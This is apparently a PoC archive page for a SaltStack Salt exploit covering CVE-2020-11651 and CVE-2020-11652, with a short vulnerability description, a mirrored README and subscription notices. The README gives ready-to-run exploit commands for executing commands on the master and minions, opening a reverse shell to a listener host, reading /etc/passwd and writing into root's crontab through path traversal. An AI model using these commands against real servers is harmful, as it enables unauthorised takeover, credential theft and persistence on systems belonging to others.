Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2020-11652 PoC — SaltStack Salt 路径遍历漏洞

Source
Associated Vulnerability
Title:SaltStack Salt 路径遍历漏洞 (CVE-2020-11652)
Description:An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
Description
CVE-2020-11652 & CVE-2020-11651
Readme
# SaltStack-Exp
CVE-2020-11651
CVE-2020-11652

#### Exec-Master:
```
python exp.py --exec-choose master --exec-cmd "whoami"
```
#### Exec-Minions:
```
python exp.py --exec-choose minions --exec-cmd "whoami"
```
#### GetShell:
```
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
```

#### ReadFile:
```
python exp.py --read /etc/passwd
```
#### UploadFile:
```
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"
```


From :https://github.com/bravery9/SaltStack-Exp
File Snapshot

[4.0K] /data/pocs/a86a133d4c5b2304d208cd1d60d17a9efb43c1ea ├── [6.7K] CVE-2020-11652.py └── [ 529] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →